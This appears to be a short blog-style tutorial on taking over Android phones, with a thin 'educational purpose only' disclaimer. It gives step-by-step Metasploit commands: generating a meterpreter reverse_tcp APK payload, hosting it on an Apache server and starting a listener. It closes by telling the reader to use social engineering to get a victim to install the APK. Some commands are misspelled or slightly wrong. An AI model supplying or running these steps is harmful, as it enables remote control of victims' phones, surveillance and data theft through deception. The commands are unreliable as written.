Let's H4ck Android Devices!





Warning

Educational Purpose Only!
We are not responible for anything do using the information we share. Please don't harm anyone this post is strictly for educational purpose.



So Let's Start!
You will need any linux distro with metasploit and apache server install.
Open terminal and enter the following command to generate an android apk payload.

Command:

msfnom -p
android/meterpreter/reverse_tcp
LHOST=<your ip address> LPORT=4444 R> /var/www/html/android.apk

Now, you need to check the apache server. To start apache server enter the command given below.

Command:

service apache2 start

After you'll enter the above command, apache service will be started.

Now start metasploit using the command given below.

Command:
msfconsole

Now we need to use the handler, follow the commands line by line.

Command:
use multi handler

set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <your ip address>
set LPORT 4444
exploit

After this you will get a message (+) Started reverse TCP handler on <your ip address>:4444

This means that the attack is active.
Use some social engineering and get your victim to install the APK!